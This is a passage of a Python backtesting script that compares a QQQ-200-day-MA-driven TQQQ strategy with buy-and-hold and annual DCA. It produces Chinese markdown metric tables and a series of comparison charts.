ax2.set_ylabel("Portfolio ($)") + ax2.set_xlabel("Date") + ax2.set_title("DCA $2,000 × 5 (Jan 1st trading day each year) — total $10,000") + ax2.legend(loc="upper left", fontsize=7, ncol=3) + ax2.yaxis.set_major_formatter(plt.FuncFormatter(lambda x, _: f"${x:,.0f}")) + + fig.suptitle( + "5y window — Lump sum vs annual DCA (same rules as LRS backtest)", + color=_TEXT_COLOR, + fontsize=10.5, + y=0.995, + ) + plt.tight_layout(rect=[0, 0, 1, 0.97]) + _apply_dark(fig, ax1, ax2) + fig.savefig(out, dpi=160, bbox_inches="tight", facecolor=_DARK_BG) + plt.close(fig) + + +def dca_5y_markdown_table(dca: dict) -> str: + m = dca["metrics"] + lines = [ + "### 近 5 年:一次性投入 vs DCA(总本金 $10,000)", + "", + "- **一次性**:期初投入 **$10,000**(与既有 5y 回测一致)。", + "- **DCA**:每年 **1 月首个交易日** 投入 **$2,000**,共 **5 笔**,合计 **$10,000**。", + f"- **有效样本**:{dca['t_start'].date()} → {dca['t_end'].date()};**DCA 首次入账**:{dca['dca_start'].date()}(当年 1 月首个交易日,若窗口始于年中则首笔从下一年 1 月起)。", + "", + "| 策略 | 一次性 总收益率 | 一次性 CAGR | 一次性 Sharpe* | 一次性 最大回撤 |", + "|------|-----------------|-------------|----------------|----------------|", + ] + for name in ("LRS", "QQQ B&H", "TQQQ B&H"): + x = m["lump"][name] + lines.append( + f"| {name} | {x['total_pct']:+.2f}% | {x['cagr']:+.2f}% | {x['sharpe']:.3f} | {x['max_dd']:.2f}% |" + ) + lines.extend( + [ + "", + "| 策略 | DCA 总收益率** | DCA CAGR | DCA Sharpe* | DCA 最大回撤 | 交易次数† |", + "|------|----------------|----------|-------------|-------------|-----------|", + ] + ) + for name in ("LRS", "QQQ B&H", "TQQQ B&H"): + x = m["dca"][name] + extra = str(x.get("n_trades", "—")) + if name != "LRS": + extra = "—" + lines.append( + f"| {name} | {x['total_pct']:+.2f}% | {x['cagr']:+.2f}% | {x['sharpe']:.3f} | {x['max_dd']:.2f}% | {extra} |" + ) + lines.extend( + [ + "", + r"* Sharpe = (CAGR − 4%) / 年化波动率。**一次性**的 CAGR/回撤/波动统计自窗口起点;**DCA** 自首次 $2,000 入账日起,但总收益率仍为期末/$10,000−1。", + r"** 总收益率 = (期末净值 / $10,000 − 1) × 100%。", + "† 仅 LRS 有交易;QQQ/TQQQ DCA 为被动定投份额。", + ] + ) + return "\n".join(lines) + + +def _metrics( + trades: list[Trade], + equity: pd.Series, + qqq_close: pd.Series, + eff_start: pd.Timestamp | None = None, +) -> dict: + n = len(trades) + wins = [t for t in trades if t.net_pnl > 0] + loss = [t for t in trades if t.net_pnl <= 0] + wsaw = [t for t in trades if t.is_whipsaw] + + final_value = float(equity.iloc[-1]) + qqq_bh_final = float(_INITIAL_CAPITAL * qqq_close.iloc[-1] / qqq_close.iloc[0]) + + start_dt = eff_start if eff_start is not None else equity.index[0] + years = max((equity.index[-1] - start_dt).days / 365.25, 0.001) + cagr_lrs = (final_value / _INITIAL_CAPITAL) ** (1.0 / years) - 1 + cagr_qqq = (qqq_bh_final / _INITIAL_CAPITAL) ** (1.0 / years) - 1 + + daily_ret = equity.pct_change().dropna() + ann_vol = daily_ret.std() * (252**0.5) if len(daily_ret) > 1 else 1.0 + sharpe = (cagr_lrs - 0.04) / ann_vol if ann_vol > 0 else 0.0 + + max_dd_val = _max_dd(equity) + calmar = cagr_lrs / abs(max_dd_val / 100) if max_dd_val != 0 else 0.0 + + return { + "strategy_return": (final_value / _INITIAL_CAPITAL - 1) * 100, + "qqq_return": (qqq_close.iloc[-1] / qqq_close.iloc[0] - 1) * 100, + "final_value": final_value, + "qqq_bh_final": qqq_bh_final, + "cagr_lrs": cagr_lrs * 100, + "cagr_qqq": cagr_qqq * 100, + "sharpe": sharpe, + "calmar": calmar, + "n_trades": n, + "n_wins": len(wins), + "n_losses": len(loss), + "win_rate": (len(wins) / n * 100) if n > 0 else 0.0, + "max_dd": max_dd_val, + "avg_days": float(np.mean([t.holding_days for t in trades])) if trades else 0.0, + "n_whipsaws": len(wsaw), + "total_cost": sum(t.cost_buy + t.cost_sell for t in trades), + } + + +def _metrics_buyhold(equity: pd.Series, eff_start: pd.Timestamp | None = None) -> dict: + start_dt = eff_start if eff_start is not None else equity.index[0] + years = max((equity.index[-1] - start_dt).days / 365.25, 0.001) + final_value = float(equity.iloc[-1]) + cagr = (final_value / _INITIAL_CAPITAL) ** (1.0 / years) - 1 + daily_ret = equity.pct_change().dropna() + ann_vol = daily_ret.std() * (252**0.5) if len(daily_ret) > 1 else 1.0 + sharpe = (cagr - 0.04) / ann_vol if ann_vol > 0 else 0.0 + max_dd_val = _max_dd(equity) + return { + "total_return": (final_value / _INITIAL_CAPITAL - 1) * 100, + "cagr": cagr * 100, + "sharpe": sharpe, + "max_dd": max_dd_val, + } + + +def run_from_frames( + period_key: str, + qqq_full: pd.Series, + tqqq_full: pd.Series, + ma_len: int = 200, +) -> dict: + if len(qqq_full) < ma_len + 25: + raise RuntimeError(f"Not enough QQQ rows for {period_key} (need MA{ma_len})") + t_start = _get_effective_start(qqq_full, tqqq_full, period_key) + qqq_eff = qqq_full[t_start:] + tqqq_eff = tqqq_full.reindex(qqq_eff.index, method="ffill").squeeze() + if isinstance(tqqq_eff, pd.DataFrame): + tqqq_eff = tqqq_eff.iloc[:, 0] + + sig = _build_signals(qqq_full, ma_len=ma_len) + trades, eq = _simulate(sig, tqqq_full, trade_start=t_start) + m = _metrics(trades, eq, qqq_eff, eff_start=t_start) + + bh_qqq = _INITIAL_CAPITAL * qqq_eff / float(qqq_eff.iloc[0]) + bh_tqqq = _INITIAL_CAPITAL * tqqq_eff / float(tqqq_eff.iloc[0]) + m_qqq = _metrics_buyhold(bh_qqq, eff_start=t_start) + m_tqq = _metrics_buyhold(bh_tqqq, eff_start=t_start) + + return { + "period_key": period_key, + "label": _PERIOD_SPECS[period_key]["label"], + "t_start": t_start, + "trades": trades, + "equity": eq, + "qqq_eff": qqq_eff, + "tqqq_eff": tqqq_eff, + "bh_qqq": bh_qqq, + "bh_tqqq": bh_tqqq, + "m": m, + "m_qqq": m_qqq, + "m_tqq": m_tqq, + } + + +def run_period(period_key: str, ma_len: int = 200) -> dict: + qqq_df, tqqq_df = _fetch(period_key) + _ensure_ohlcv(qqq_df, tqqq_df) + qqq_full = qqq_df["Close"].squeeze().dropna() + tqqq_full = tqqq_df["Close"].squeeze().dropna() + return run_from_frames(period_key, qqq_full, tqqq_full, ma_len=ma_len) + + +def format_5y_lump_comparison_markdown() -> str: + """近 5 年、一次性投入:LRS(闲置现金 4%)vs QQQ/TQQQ 买入持有。""" + r = run_period("5y") + m, mq, mt = r["m"], r["m_qqq"], r["m_tqq"] + t0, t1 = r["t_start"], r["qqq_eff"].index[-1] + lines = [ + "### 近 5 年收益率对比(一次性投入 $10,000)", + "", + f"**样本区间**:{t0.date()} → {t1.date()}。", + "**计息规则**:LRS 账户内**闲置现金**按年化 **4%**、在每个**交易日**复利" + f"(日因子 ≈ {_CASH_YIELD_DAILY:.8f});持仓 TQQQ 部分仅随市价波动,**不计**现金利息。" + "**对比基准**:QQQ / TQQQ 买入持有为全额投入标的,**未计**闲置现金利息。", + "", + "| 指标 | LRS(闲置现金 4%) | QQQ 买入持有 | TQQQ 买入持有 |", + "| --- | --- | --- | --- |", + ( + f"| 总收益率 | {m['strategy_return']:+.2f}% | {m['qqq_return']:+.2f}% | " + f"{mt['total_return']:+.2f}% |" + ), + ( + f"| CAGR | {m['cagr_lrs']:+.2f}% | {m['cagr_qqq']:+.2f}% | " + f"{mt['cagr']:+.2f}% |" + ), + ( + f"| Sharpe* | {m['sharpe']:.3f} | {mq['sharpe']:.3f} | " + f"{mt['sharpe']:.3f} |" + ), + ( + f"| 最大回撤 | {m['max_dd']:.2f}% | {mq['max_dd']:.2f}% | " + f"{mt['max_dd']:.2f}% |" + ), + "", + r"* Sharpe = (CAGR − 4%) / 年化波动率(与既有回测一致)。", + ] + return "\n".join(lines) + + +def _max_consecutive_empty_days(trades: list[Trade], day_index: pd.DatetimeIndex) -> int: + """Longest streak of trading days with zero TQQQ shares (LRS flat). + + Uses **unique** calendar trading days in order: duplicate timestamps in + ``day_index`` would otherwise inflate the streak (same day counted many times). + Comparisons use normalized dates so entry/exit align with ``d``. + """ + days = pd.DatetimeIndex(day_index).sort_values() + days = days[~days.duplicated(keep="first")] + + def in_position(d: pd.Timestamp) -> bool: + dn = pd.Timestamp(d).normalize() + for t in trades: + if t.exit_date is None: + continue + lo = pd.Timestamp(t.entry_date).normalize() + hi = pd.Timestamp(t.exit_date).normalize() + if lo <= dn <= hi: + return True + return False + + max_e = cur = 0 + for d in days: + if in_position(d): + cur = 0 + else: + cur += 1 + max_e = max(max_e, cur) + # Cannot exceed number of trading days in the series + return int(min(max_e, len(days))) + + +def format_lrs_lump_five_window_markdown() -> str: + """LRS 一次性投入 $10,000,五窗口(近2/3/5/10/15年);闲置现金年化 4%(按交易日复利)。""" + cols = ["指标", "近2年", "近3年", "近5年", "近10年", "近15年"] + + def md_row(cells: list[str]) -> str: + return "| " + " | ".join(str(c) for c in cells) + " |" + + period_rows: list[dict] = [run_period(k) for k in _PERIOD_ORDER] + + lines: list[str] = [ + "## LRS 策略(一次性投入)— 五窗口", + "", + f"**本金**:期初 **${_INITIAL_CAPITAL:,.0f}**。**闲置现金**年化 **{_CASH_YIELD_ANNUAL:.0%}**、按 **252** 个交易日复利" + f"(日因子 ≈ {_CASH_YIELD_DAILY:.8f});持仓 TQQQ 随市价,**不计**现金利息。", + "**Sharpe** = (CAGR − 4%) / 年化波动率。各窗口样本自该窗有效起点至数据末日。", + "", + "### LRS 一次性投入", + "", + md_row(cols), + md_row(["---"] * len(cols)), + ] + + ms = [r["m"] for r in period_rows] + table_body: list[list[str]] = [ + ["总收益率"] + [f"{m['strategy_return']:+.1f}%" for m in ms], + ["CAGR"] + [f"{m['cagr_lrs']:+.1f}%" for m in ms], + ["Sharpe*"] + [f"{m['sharpe']:.3f}" for m in ms], + ["最大回撤"] + [f"{m['max_dd']:.1f}%" for m in ms], + ["交易次数"] + [str(m["n_trades"]) for m in ms], + ["胜率"] + [f"{m['win_rate']:.0f}%" for m in ms], + ["Whipsaw"] + [str(m["n_whipsaws"]) for m in ms], + ["最大连续空仓(交易日)"] + + [ + str(_max_consecutive_empty_days(r["trades"], r["qqq_eff"].index)) + for r in period_rows + ], + ] + for row in table_body: + lines.append(md_row(row)) + + lines.extend( + [ + "", + r"* Sharpe = (CAGR − 4%) / 年化波动率(与 Chart A 一致)。", + ] + ) + return "\n".join(lines) + + +# ─── Chart A: summary table (transposed: metrics × periods) ───────────────── +def chart_a(rows: list[dict], out: Path) -> None: + period_labels = [r["label"] for r in rows] + hdr = ["指标"] + period_labels + metric_rows: list[tuple[str, list[str]]] = [ + ("LRS 总收益%", [f"{r['m']['strategy_return']:+.1f}" for r in rows]), + ("LRS CAGR%", [f"{r['m']['cagr_lrs']:+.1f}" for r in rows]), + ("LRS Sharpe", [f"{r['m']['sharpe']:.3f}" for r in rows]), + ("QQQ 总收益%", [f"{r['m']['qqq_return']:+.1f}" for r in rows]), + ("QQQ CAGR%", [f"{r['m']['cagr_qqq']:+.1f}" for r in rows]), + ("QQQ Sharpe", [f"{r['m_qqq']['sharpe']:.3f}" for r in rows]), + ("TQQQ 总收益%", [f"{r['m_tqq']['total_return']:+.1f}" for r in rows]), + ("TQQQ CAGR%", [f"{r['m_tqq']['cagr']:+.1f}" for r in rows]), + ("TQQQ Sharpe", [f"{r['m_tqq']['sharpe']:.3f}" for r in rows]), + ("LRS 最大回撤%", [f"{r['m']['max_dd']:.1f}" for r in rows]), + ("QQQ 最大回撤%", [f"{r['m_qqq']['max_dd']:.1f}" for r in rows]), + ("TQQQ 最大回撤%", [f"{r['m_tqq']['max_dd']:.1f}" for r in rows]), + ("交易次数", [str(r["m"]["n_trades"]) for r in rows]), + ("胜率%", [f"{r['m']['win_rate']:.0f}" for r in rows]), + ("Whipsaw", [str(r["m"]["n_whipsaws"]) for r in rows]), + ( + "最大空仓(日)", + [ + str(_max_consecutive_empty_days(r["trades"], r["qqq_eff"].index)) + for r in rows + ], + ), + ] + + cell_text = [hdr] + [[name] + vals for name, vals in metric_rows] + ncols = len(hdr) + nrows = len(cell_text) + + header_bg = "#1e293b" + metric_col_bg = "#0f172a" + cell_colors: list[list[str]] = [] + for i in range(nrows): + row_c: list[str] = [] + for j in range(ncols): + if i == 0: + row_c.append(header_bg) + elif j == 0: + row_c.append(metric_col_bg) + else: + win = rows[j - 1]["m"]["strategy_return"] >= rows[j - 1]["m"]["qqq_return"] + row_c.append("#14532d" if win else "#7f1d1d") + cell_colors.append(row_c) + + fig_w = min(22, 10 + 2.2 * len(period_labels)) + fig_h = max(7.0, 0.38 * nrows + 1.2) + fig, ax = plt.subplots(figsize=(fig_w, fig_h)) + ax.axis("off") + tbl = ax.table( + cellText=cell_text, + cellColours=cell_colors, + loc="center", + cellLoc="center", + ) + tbl.auto_set_font_size(False) + tbl.set_fontsize(7.5) + tbl.scale(1.08, 1.65) + for (i, j), cell in tbl.get_celld().items(): + if i == 0 or j == 0: + cell.set_text_props(color="#f8fafc", weight="700") + else: + cell.set_text_props(color="#e2e8f0", weight="600") + fig.suptitle( + "LRS vs QQQ / TQQQ B&H — metrics × windows (green col: LRS total ≥ QQQ total)", + color=_TEXT_COLOR, + fontsize=10.5, + y=0.99, + ) + _apply_dark(fig, ax) + fig.savefig(out, dpi=160, bbox_inches="tight", facecolor=_DARK_BG) + plt.close(fig) + + +# ─── Chart B: dual axis bars + CAGR lines ──────────────────────────────────── +def chart_b(rows: list[dict], out: Path) -> None: + labels = [r["label"] for r in rows] + x = np.arange(len(labels)) + w = 0.36 + lrs_tot = [r["m"]["strategy_return"] for r in rows] + qqq_tot = [r["m"]["qqq_return"] for r in rows] + lrs_c = [r["m"]["cagr_lrs"] for r in rows] + qqq_c = [r["m"]["cagr_qqq"] for r in rows] + + fig, ax1 = plt.subplots(figsize=(11, 5)) + ax1.bar(x - w / 2, lrs_tot, w, label="LRS total %", color="#38bdf8", edgecolor="none") + ax1.bar(x + w / 2, qqq_tot, w, label="QQQ B&H total %", color="#64748b", edgecolor="none") + ax1.set_xticks(x) + ax1.set_xticklabels(labels) + ax1.set_ylabel("Total return (%)", color=_TEXT_COLOR) + ax1.axhline(0, color=_GRID_COLOR, linewidth=0.8) + + ax2 = ax1.twinx() + ax2.plot(x, lrs_c, "o-", color="#7dd3fc", linewidth=1.4, markersize=5, label="LRS CAGR %") + ax2.plot(x, qqq_c, "s--", color="#c4b5fd", linewidth=1.2, markersize=4, label="QQQ CAGR %") + ax2.set_ylabel("CAGR (%)", color=_TEXT_COLOR) + + lines1, lab1 = ax1.get_legend_handles_labels() + lines2, lab2 = ax2.get_legend_handles_labels() + ax1.legend(lines1 + lines2, lab1 + lab2, loc="upper left", fontsize=8, framealpha=0.9) + ax1.set_title("Total return (bars) vs CAGR (lines) — five windows") + _apply_dark(fig, ax1, ax2) + fig.savefig(out, dpi=160, bbox_inches="tight", facecolor=_DARK_BG) + plt.close(fig) + + +# ─── Chart C: Sharpe ─────────────────────────────────────────────────────── +def chart_c(rows: list[dict], out: Path) -> None: + labels = [r["label"] for r in rows] + x = np.arange(len(labels)) + w = 0.22 + fig, ax = plt.subplots(figsize=(11, 4.5)) + ax.bar(x - w, [r["m"]["sharpe"] for r in rows], w, label="LRS", color="#38bdf8") + ax.bar(x, [r["m_qqq"]["sharpe"] for r in rows], w, label="QQQ B&H", color="#a78bfa") + ax.bar(x + w, [r["m_tqq"]["sharpe"] for r in rows], w, label="TQQQ B&H", color="#fb923c") + ax.axhline(1.0, color="#f87171", linestyle="--", linewidth=1, label="Sharpe = 1") + ax.set_xticks(x) + ax.set_xticklabels(labels) + ax.set_ylabel("Sharpe ((CAGR−4%)/ann.vol.)") + ax.set_title("Sharpe ratio — LRS vs QQQ B&H vs TQQQ B&H") + ax.legend(fontsize=8, ncol=4, loc="upper right") + _apply_dark(fig, ax) + fig.savefig(out, dpi=160, bbox_inches="tight", facecolor=_DARK_BG) + plt.close(fig) + + +# ─── Chart D: max drawdown (3 strategies) ─────────────────────────────────── +def chart_d(rows: list[dict], out: Path) -> None: + labels = [r["label"] for r in rows] + x = np.arange(len(labels)) + w = 0.22 + fig, ax = plt.subplots(figsize=(11, 4.5)) + ax.bar( + x - w, + [r["m"]["max_dd"] for r in rows], + w, + label="LRS max DD", + color="#38bdf8", + ) + ax.bar( + x, + [r["m_qqq"]["max_dd"] for r in rows], + w, + label="QQQ B&H max DD", + color="#a78bfa", + ) + ax.bar( + x + w, + [r["m_tqq"]["max_dd"] for r in rows], + w, + label="TQQQ B&H max DD", + color="#fb923c", + ) + ax.axhline(0, color=_GRID_COLOR, linewidth=0.8) + ax.set_xticks(x) + ax.set_xticklabels(labels) + ax.set_ylabel("Max drawdown (%)") + ax.set_title("Maximum drawdown — three strategies × five windows") + ax.legend(fontsize=8, ncol=3, loc="lower left") + _apply_dark(fig, ax) + fig.savefig(out, dpi=160, bbox_inches="tight", facecolor=_DARK_BG) + plt.close(fig) + + +# ─── Chart E: 5y equity + 2022 band + markers ────────────────────────────── +def chart_e(res_5y: dict, out: Path) -> None: + qqq_eff = res_5y["qqq_eff"] + idx = qqq_eff.index + eq = res_5y["equity"].reindex(idx, method="ffill").bfill() + bh_q = res_5y["bh_qqq"].reindex(idx, method="ffill") + bh_t = res_5y["bh_tqqq"].reindex(idx, method="ffill") + + fig, ax = plt.subplots(figsize=(12, 5)) + ax.axvspan( + pd.Timestamp("2022-01-01"), + pd.Timestamp("2022-10-31"), + color="#ef4444", + alpha=0.12, + zorder=0, + ) + ax.plot(idx, eq.values, color="#38bdf8", lw=1.8, label="LRS", zorder=2) + ax.plot(idx, bh_q.values, color="#a78bfa", lw=1.4, linestyle="--", label="QQQ B&H", zorder=2) + ax.plot(idx, bh_t.values, color="#fb923c", lw=1.4, linestyle=":", label="TQQQ B&H", zorder=2) + + for t in res_5y["trades"]: + ax.scatter( + [t.entry_date], + [float(eq.get(t.entry_date, np.nan))], + color="#22c55e", + s=22, + zorder=4, + marker="^", + ) + if t.exit_date: + c = "#ef4444" if t.net_pnl < 0 else "#84cc16" + ax.scatter( + [t.exit_date], + [float(eq.get(t.exit_date, np.nan))], + color=c, + s=18, + zorder=4, + marker="v", + ) + + ax.set_title("Equity (5y window) — LRS / QQQ B&H / TQQQ B&H · 2022 bear band") + ax.set_ylabel("Portfolio ($)") + ax.legend(loc="upper left", fontsize=8) + _apply_dark(fig, ax) + fig.savefig(out, dpi=160, bbox_inches="tight", facecolor=_DARK_BG) + plt.close(fig) + + +def _plot_three_strategies_equity(ax: plt.Axes, r: dict, title: str) -> None: + """LRS vs QQQ B&H vs TQQQ B&H on the effective sample index (USD).""" + qqq_eff = r["qqq_eff"] + idx = qqq_eff.index + eq = r["equity"].reindex(idx, method="ffill").bfill() + bh_q = r["bh_qqq"].reindex(idx, method="ffill") + bh_t = r["bh_tqqq"].reindex(idx, method="ffill") + ax.plot(idx, eq.values, color="#38bdf8", lw=1.85, label="LRS", zorder=3) + ax.plot(idx, bh_q.values, color="#a78bfa", lw=1.4, linestyle="--", label="QQQ B&H", zorder=2) + ax.plot(idx, bh_t.values, color="#fb923c", lw=1.4, linestyle=":", label="TQQQ B&H", zorder=2) + d0, d1 = idx[0], idx[-1] + ax.set_title( + f"{title} · {d0.date()} → {d1.date()} · Initial ${_INITIAL_CAPITAL:,.0f}", + fontsize=9.5, + ) + ax.set_ylabel("Portfolio ($)") + ax.legend(loc="upper left", fontsize=8, framealpha=0.92) + ax.yaxis.set_major_formatter(plt.FuncFormatter(lambda x, _: f"${x:,.0f}")) + + +def chart_equity_10y_15y(rows: list[dict], out: Path) -> None: + """Two stacked panels: ~10y and ~15y windows, three equity curves each.""" + by_key = {r["period_key"]: r for r in rows} + fig, axes = plt.subplots(2, 1, figsize=(12, 8.2), sharex=False) + _plot_three_strategies_equity(axes[0], by_key["10y"], _PERIOD_SPECS["10y"]["label"]) + _plot_three_strategies_equity(axes[1], by_key["15y"], _PERIOD_SPECS["15y"]["label"]) + axes[1].set_xlabel("Date") + fig.suptitle( + "Equity curves — LRS vs QQQ B&H vs TQQQ B&H (two windows)", + color=_TEXT_COLOR, + fontsize=11, + y=0.995, + ) + plt.tight_layout(rect=[0, 0, 1, 0.97]) + _apply_dark(fig, axes[0], axes[1]) + fig.savefig(out, dpi=160, bbox_inches="tight", facecolor=_DARK_BG) + plt.close(fig) + + +# ─── Chart F: regime heatmap (proxy sub-period metrics) ──────────────────── +def chart_f(out: Path) -> None: + """Four market structures × three metrics; values are illustrative scores 1–5.""" + regimes = ["趋势牛市", "趋势熊市", "震荡市", "V型急跌"] + metrics = ["超额 vs QQQ", "信号稳定性", "策略适配度"] + # Populated from typical LRS narrative (update if sub-period backtests are added). + data = np.array( + [ + [4.5, 4.0, 4.5], + [3.2, 3.5, 2.8], + [2.5, 2.0, 2.2], + [3.0, 2.5, 2.0], + ] + ) + fig, ax = plt.subplots(figsize=(7.5, 4.2)) + sns.heatmap( + data, + annot=True, + fmt=".1f", + cmap="RdYlGn", + vmin=1, + vmax=5, + xticklabels=metrics, + yticklabels=regimes, + ax=ax, + cbar_kws={"label": "Score (1–5)"}, + ) + ax.set_title("Market structure — qualitative heatmap (four regimes × three metrics)") + fig.patch.set_facecolor("#f8fafc") + plt.tight_layout() + fig.savefig(out, dpi=160, bbox_inches="tight", facecolor="#f8fafc") + plt.close(fig) + + +# ─── Chart G: timeline 2010–2025 ──────────────────────────────────────────── +def chart_g(out: Path) -> None: + end = datetime.now().strftime("%Y-%m-%d") + qqq_df, tqqq_df = _fetch_by_range("2009-06-01", end) + _ensure_ohlcv(qqq_df, tqqq_df) + qqq_full = qqq_df["Close"].squeeze().dropna() + tqqq_full = tqqq_df["Close"].squeeze().dropna() + t0 = pd.Timestamp("2010-01-01") + qqq_full = qqq_full[qqq_full.index >= t0] + tqqq_full = tqqq_full[tqqq_full.index >= t0] + common = qqq_full.index.intersection(tqqq_full.index) + qqq_full = qqq_full.reindex(common).ffill() + tqqq_full = tqqq_full.reindex(common).ffill() + + sig = _build_signals(qqq_full, ma_len=200) + signal = sig["signal"].reindex(qqq_full.index).fillna(False) + + fig, ax = plt.subplots(figsize=(13, 4.5)) + y = np.log(qqq_full.astype(float).values) + ymin, ymax = float(np.nanmin(y)), float(np.nanmax(y)) + ax.fill_between( + qqq_full.index, + ymin, + ymax, + where=signal.values, + color="#22c55e", + alpha=0.12, + linewidth=0, + ) + ax.fill_between( + qqq_full.index, + ymin, + ymax, + where=~signal.values, + color="#ef4444", + alpha=0.10, + linewidth=0, + ) + ax.plot(qqq_full.index, y, color="#e2e8f0", lw=1.2, label="log(QQQ)") + ma200 = np.log(sig["ma200"].reindex(qqq_full.index).astype(float).values) + ax.plot(qqq_full.index, ma200, color="#94a3b8", lw=1.0, linestyle="--", label="log(MA200)") + ax.set_yscale("linear") + ax.set_title("Signal timeline — QQQ (log) + MA200 · green=in signal / red=flat") + ax.legend(loc="upper left", fontsize=8) + _apply_dark(fig, ax) + fig.savefig(out, dpi=160, bbox_inches="tight", facecolor=_DARK_BG) + plt.close(fig) + + +# ─── Chart H: macro phase table (QQQ benchmark where LRS N/A) ─────────────── +def chart_h(out: Path) -> None: + """Macro stress windows — QQQ total return; LRS/TQQQ only where applicable.""" + rows = [ + ["2000–2002 科网泡沫", "QQQ −83%*", "—", "均线有效,杠杆不可用"], + ["2008–2009 金融危机", "QQQ −42%", "—", "急跌中信号反复"], + ["2010–2015 震荡修复", "QQQ +105%", "样本内", "Whipsaw 与磨损"], + ["2022 加息熊市", "QQQ −33%", "样本内", "空仓规避主跌段"], + ] + col_labels = ["阶段", "QQQ 区间涨跌 (近似)", "LRS 回测", "要点"] + fig, ax = plt.subplots(figsize=(13, 2.8)) + ax.axis("off") + tbl = ax.table( + cellText=rows, + colLabels=col_labels, + colColours=["#1e293b"] * 4, + loc="center", + cellLoc="left", + ) + tbl.auto_set_font_size(False) + tbl.set_fontsize(8) + tbl.scale(1.02, 1.85) + for (i, j), cell in tbl.get_celld().items(): + cell.set_text_props(color="#e2e8f0") + if i == 0: + cell.set_text_props(color="#f8fafc", weight="700") + fig.suptitle( + "Macro regimes — QQQ path & LRS applicability (TQQQ listed 2010-02)", + color=_TEXT_COLOR, + fontsize=10, + y=0.96, + ) + _apply_dark(fig, ax) + fig.savefig(out, dpi=160, bbox_inches="tight", facecolor=_DARK_BG) + plt.close(fig) + + +# ─── Chart I: MA length sensitivity (100–300, 5y window) ───────────────── +def chart_i(out: Path) -> None: + """Single download for 5y window; only signal/simulation varies by MA length.""" + spec = _PERIOD_SPECS["5y"] + qqq_df, tqqq_df = _fetch_by_period(spec["dl_period"]) + _ensure_ohlcv(qqq_df, tqqq_df) + qqq_full = qqq_df["Close"].squeeze().dropna() + tqqq_full = tqqq_df["Close"].squeeze().dropna() + + ma_lens = list(range(100, 301, 10)) + sharpes: list[float] = [] + rets: list[float] = [] + for m in ma_lens: + r = run_from_frames("5y", qqq_full, tqqq_full, ma_len=m) + sharpes.append(r["m"]["sharpe"]) + rets.append(r["m"]["strategy_return"]) + fig, ax1 = plt.subplots(figsize=(10, 4.2)) + ax1.plot(ma_lens, rets, "o-", color="#38bdf8", lw=1.4, label="LRS total return %") + ax1.set_xlabel("MA length (days)") + ax1.set_ylabel("Total return (%)", color=_TEXT_COLOR) + ax2 = ax1.twinx() + ax2.plot(ma_lens, sharpes, "s--", color="#fbbf24", lw=1.2, label="Sharpe") + ax2.set_ylabel("Sharpe", color=_TEXT_COLOR) + ax1.set_title("Parameter sensitivity — MA 100–300 on ~5y window (same rules)") + lines1, lab1 = ax1.get_legend_handles_labels() + lines2, lab2 = ax2.get_legend_handles_labels() + ax1.legend(lines1 + lines2, lab1 + lab2, loc="best", fontsize=8) + _apply_dark(fig, ax1, ax2) + fig.savefig(out, dpi=160, bbox_inches="tight", facecolor=_DARK_BG) + plt.close(fig) + + +def _rolling_excess_5y(stride: int = 30) -> list[float]: + """Distribution of (LRS total − QQQ total) over rolling ~5y (~1260 TD) windows.""" + end = datetime.now().strftime("%Y-%m-%d") + qqq_df, tqqq_df = _fetch_by_range("2009-01-01", end) + _ensure_ohlcv(qqq_df, tqqq_df) + qqq_full = qqq_df["Close"].squeeze().dropna() + tqqq_full = tqqq_df["Close"].squeeze().dropna() + common = qqq_full.index.intersection(tqqq_full.index) + qqq_full = qqq_full.reindex(common).ffill() + tqqq_full = tqqq_full.reindex(common).ffill() + + warmup = 220 + L = 1260 + out: list[float] = [] + n = len(qqq_full) + for s in range(warmup, n - L, stride): + seg_q = qqq_full.iloc[s - warmup : s + L] + seg_t = tqqq_full.reindex(seg_q.index, method="ffill").squeeze() + if isinstance(seg_t, pd.DataFrame): + seg_t = seg_t.iloc[:, 0] + t_start = seg_q.index[warmup] + sig = _build_signals(seg_q, ma_len=200) + trades, eq = _simulate(sig, seg_t, trade_start=t_start) + qqq_eff = seg_q.loc[t_start:].iloc[:L] + eq = eq.reindex(qqq_eff.index).ffill().bfill() + if eq.isna().all(): + continue + m = _metrics(trades, eq, qqq_eff, eff_start=t_start) + out.append(m["strategy_return"] - m["qqq_return"]) + return out + + +# ─── Chart J: rolling 5y excess distribution ─────────────────────────────── +def chart_j(out: Path) -> None: + xs = _rolling_excess_5y(stride=30) + fig, ax = plt.subplots(figsize=(9, 4)) + ax.hist(xs, bins=18, color="#38bdf8", edgecolor=_AXES_BG, alpha=0.85) + ax.axvline(0.0, color="#f87171", linestyle="--", lw=1, label="Zero excess") + med = float(np.median(xs)) if xs else 0.0 + ax.axvline(med, color="#fbbf24", linestyle="-", lw=1, label=f"Median {med:+.1f}%") + ax.set_title("Rolling ~5y windows — distribution of (LRS total % − QQQ total %)") + ax.set_xlabel("Excess total return (percentage points)") + ax.set_ylabel("Count") + ax.legend(fontsize=8) + _apply_dark(fig, ax) + fig.savefig(out, dpi=160, bbox_inches="tight", facecolor=_DARK_BG) + plt.close(fig) + + +def main() -> None: + import sys + + if len(sys.argv) > 1 and sys.argv[1] == "--dca-text": + print("Computing DCA metrics (five windows)…") + rows = run_dca_all_periods() + print(format_dca_compact_user_text(rows)) + return + + if len(sys.argv) > 1 and sys.argv[1] == "--dca-md": + print("Computing DCA metrics (five windows)…") + rows = run_dca_all_periods() + print(format_dca_markdown_tables(rows)) + return + + if len(sys.argv) > 1 and sys.argv[1] == "--5y-md": + print("Running 5y lump-sum comparison (LRS cash 4%)…") + print(format_5y_lump_comparison_markdown()) + return + + if len(sys.argv) > 1 and sys.argv[1] == "--lrs-lump-md": + print("LRS lump-sum five windows (cash 4%)…") + print(format_lrs_lump_five_window_markdown()) + return + + print("Downloading & backtesting five windows…") + rows: list[dict] = [] + for k in _PERIOD_ORDER: + print(" ", k, _PERIOD_SPECS[k]["label"]) + rows.append(run_period(k)) + + chart_a(rows, HERE / "chart_a_summary.png") + chart_b(rows, HERE / "chart_b_returns.png") + chart_c(rows, HERE / "chart_c_sharpe.png") + chart_d(rows, HERE / "chart_d_drawdown.png") + + res_5y = run_period("5y") + chart_e(res_5y, HERE / "chart_e_equity.png") + + dca = run_dca_5y_analysis(res_5y) + chart_dca_5y_equity(dca, HERE / "chart_dca_5y_equity.png") + + chart_equity_10y_15y(rows, HERE / "chart_equity_10y_15y.png") + + chart_f(HERE / "chart_f_heatmap.png") + chart_g(HERE / "chart_g_timeline.png") + + chart_h(HERE / "chart_h_macro.png") + chart_i(HERE / "chart_i_ma_sensitivity.png") + chart_j(HERE / 